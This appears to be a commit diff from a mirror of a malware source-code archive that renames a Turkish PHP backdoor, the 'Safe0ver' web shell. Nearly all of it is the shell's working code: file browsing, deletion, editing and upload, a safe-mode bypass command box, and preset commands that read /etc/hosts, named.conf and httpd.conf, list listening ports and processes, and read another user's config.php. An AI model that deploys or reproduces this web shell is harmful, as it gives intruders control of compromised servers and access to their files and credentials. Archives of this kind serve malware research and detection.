mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Rename Backdoor.PHP.Agent.br to Backdoor.PHP.SafeoverShell
This commit is contained in:
parent
0f7d0134b4
commit
941f9491a1
@ -294,10 +294,10 @@ if ( $cmd=="dir" ) {
|
|||||||
$h=@opendir($dir);
|
$h=@opendir($dir);
|
||||||
if ($h == false) {
|
if ($h == false) {
|
||||||
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
|
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
|
||||||
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
|
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
|
||||||
Script Gecisi Tamamlayamadi!
|
Script Gecisi Tamamlayamadi!
|
||||||
<br><br>".sp(3)."\n
|
<br><br>".sp(3)."\n
|
||||||
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
|
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
|
||||||
<br><br></font>\n\n\n\n";
|
<br><br></font>\n\n\n\n";
|
||||||
}
|
}
|
||||||
if (function_exists('realpath')) {
|
if (function_exists('realpath')) {
|
||||||
@ -358,7 +358,7 @@ if ( $cmd=="dir" ) {
|
|||||||
Yetkiler
|
Yetkiler
|
||||||
</td>
|
</td>
|
||||||
<td NOWRAP class="silver border noleft">
|
<td NOWRAP class="silver border noleft">
|
||||||
Son Düzenleme
|
Son Düzenleme
|
||||||
</td>
|
</td>
|
||||||
<tr>
|
<tr>
|
||||||
<?php
|
<?php
|
||||||
@ -529,7 +529,7 @@ if ( $cmd=="dir" ) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
|
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
|
||||||
echo " ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya \n";
|
echo " ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya \n";
|
||||||
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
|
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
|
||||||
echo " Toplam Dosya Boyutu: ".formatsize($filesizes)." <td></tr>\n";
|
echo " Toplam Dosya Boyutu: ".formatsize($filesizes)." <td></tr>\n";
|
||||||
|
|
||||||
@ -580,14 +580,14 @@ if ( $cmd=="dir" ) {
|
|||||||
/* <!-- Other Actions --> */
|
/* <!-- Other Actions --> */
|
||||||
echo "<tr><td class=\"silver border\"> <strong>Diger Islemler: </strong> </td>\n";
|
echo "<tr><td class=\"silver border\"> <strong>Diger Islemler: </strong> </td>\n";
|
||||||
echo "<td> <b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
echo "<td> <b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
||||||
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
|
||||||
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
|
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
|
||||||
echo "<tr><td class=\"silver border\"> <strong>Script Location: </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
|
echo "<tr><td class=\"silver border\"> <strong>Script Location: </strong> </td><td> $PATH_TRANSLATED</td></tr>\n";
|
||||||
echo "<tr><td class=\"silver border\"> <strong>IP Adresin: </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
|
echo "<tr><td class=\"silver border\"> <strong>IP Adresin: </strong> </td><td> $REMOTE_ADDR </td></tr>\n";
|
||||||
echo "<tr><td class=\"silver border\"> <strong>Bulundugun Klasör: </strong></td><td> $partdir </td></tr>\n";
|
echo "<tr><td class=\"silver border\"> <strong>Bulundugun Klasör: </strong></td><td> $partdir </td></tr>\n";
|
||||||
echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Semboller: </strong </td><td>\n";
|
echo "<tr><td valign=\"top\" class=\"silver border\"> <strong>Semboller: </strong </td><td>\n";
|
||||||
echo "<table NOWRAP>";
|
echo "<table NOWRAP>";
|
||||||
echo "<tr><td><strong>D:</strong></td><td> Klasör.</td></tr>\n";
|
echo "<tr><td><strong>D:</strong></td><td> Klasör.</td></tr>\n";
|
||||||
echo "<tr><td><strong>R:</strong></td><td> Okunabilir.</td></tr>\n";
|
echo "<tr><td><strong>R:</strong></td><td> Okunabilir.</td></tr>\n";
|
||||||
echo "<tr><td><strong>W:</strong></td><td> Yazilabilir.</td></tr>\n";
|
echo "<tr><td><strong>W:</strong></td><td> Yazilabilir.</td></tr>\n";
|
||||||
echo "<tr><td><strong>X:</strong></td><td> Komut Calistirilabilir.</td></tr>\n";
|
echo "<tr><td><strong>X:</strong></td><td> Komut Calistirilabilir.</td></tr>\n";
|
||||||
@ -609,7 +609,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
|
|||||||
else {
|
else {
|
||||||
echo "Successfully removed \"$file\"<br>";
|
echo "Successfully removed \"$file\"<br>";
|
||||||
}
|
}
|
||||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
|
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
|
||||||
@ -635,7 +635,7 @@ elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
|
|||||||
else {
|
else {
|
||||||
echo "Successfully removed \"$file\"<br>";
|
echo "Successfully removed \"$file\"<br>";
|
||||||
}
|
}
|
||||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
echo "Are you sure you want to delete \"$file\" ?
|
echo "Are you sure you want to delete \"$file\" ?
|
||||||
@ -668,7 +668,7 @@ elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
|
|||||||
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
||||||
</form></center>
|
</form></center>
|
||||||
</td></tr></table></center> ";
|
</td></tr></table></center> ";
|
||||||
}
|
}
|
||||||
@ -685,7 +685,7 @@ elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
|
|||||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
|
||||||
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
|
||||||
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
|
||||||
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
|
||||||
</form></center></td></tr></table></center>";
|
</form></center></td></tr></table></center>";
|
||||||
}
|
}
|
||||||
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
|
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
|
||||||
@ -738,17 +738,17 @@ elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
|
|||||||
<table>
|
<table>
|
||||||
<tr>
|
<tr>
|
||||||
<td NOWRAP>
|
<td NOWRAP>
|
||||||
Dosya Yükleme Sekmesine Tikladiniz !
|
Dosya Yükleme Sekmesine Tikladiniz !
|
||||||
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
|
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
|
||||||
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
|
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
|
||||||
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
|
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
|
||||||
<input type="hidden" name="cmd" value="uploadproc">
|
<input type="hidden" name="cmd" value="uploadproc">
|
||||||
<input type="hidden" name="dir" value="<?php echo $dir ?>">
|
<input type="hidden" name="dir" value="<?php echo $dir ?>">
|
||||||
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
|
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
|
||||||
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
|
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
|
||||||
Dosya Yükle:<br>
|
Dosya Yükle:<br>
|
||||||
<input size="75" name="userfile" type="file"><br>
|
<input size="75" name="userfile" type="file"><br>
|
||||||
<input type="submit" value="Yükle">
|
<input type="submit" value="Yükle">
|
||||||
</form>
|
</form>
|
||||||
<br>
|
<br>
|
||||||
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
|
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
|
||||||
@ -769,14 +769,14 @@ elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
|
|||||||
$res = copy($userfile, "$dir/$userfile_name");
|
$res = copy($userfile, "$dir/$userfile_name");
|
||||||
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
|
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
|
||||||
if ($res) {
|
if ($res) {
|
||||||
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
|
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
|
||||||
echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
|
echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
|
||||||
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
|
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
echo "Yüklenemedi...";
|
echo "Yüklenemedi...";
|
||||||
}
|
}
|
||||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
||||||
echo "<br><br></td></tr></table></center>";
|
echo "<br><br></td></tr></table></center>";
|
||||||
}
|
}
|
||||||
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
|
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
|
||||||
@ -812,7 +812,7 @@ elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
|
|||||||
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
|
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
$dpos = strrpos($oldfile, "/");
|
$dpos = strrpos($oldfile, "/");
|
||||||
@ -866,13 +866,13 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the
|
|||||||
<tr>
|
<tr>
|
||||||
<td valign="top" class="silver border">
|
<td valign="top" class="silver border">
|
||||||
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
|
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
|
||||||
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullanım:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
|
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
|
||||||
</span></td>
|
</span></td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
<br><p><br>Safe Mode ByPAss<p><form method="POST">
|
<br><p><br>Safe Mode ByPAss<p><form method="POST">
|
||||||
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
|
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
|
||||||
<input type="submit" value="Çalistir"></p>
|
<input type="submit" value="Çalistir"></p>
|
||||||
</form>
|
</form>
|
||||||
<form method="POST">
|
<form method="POST">
|
||||||
<p align="center"><select size="1" name="dizin">
|
<p align="center"><select size="1" name="dizin">
|
||||||
@ -883,9 +883,9 @@ else { /* <!-- There is a incorrect or no parameter specified... Let's open the
|
|||||||
<option value="cat /etc/hosts">cat /etc/hosts</option>
|
<option value="cat /etc/hosts">cat /etc/hosts</option>
|
||||||
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
|
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
|
||||||
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
|
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
|
||||||
<option value="netstat -an | grep -i listen">Açik Portlar</option>
|
<option value="netstat -an | grep -i listen">Açik Portlar</option>
|
||||||
<option value="ps -aux">Çalisan Uygulamalar</option>
|
<option value="ps -aux">Çalisan Uygulamalar</option>
|
||||||
</select> <input type="submit" value="Çalistir"></p>
|
</select> <input type="submit" value="Çalistir"></p>
|
||||||
</form>
|
</form>
|
||||||
------------------------------------------------------------------------------------<p>
|
------------------------------------------------------------------------------------<p>
|
||||||
<?
|
<?
|
Loading…
Reference in New Issue
Block a user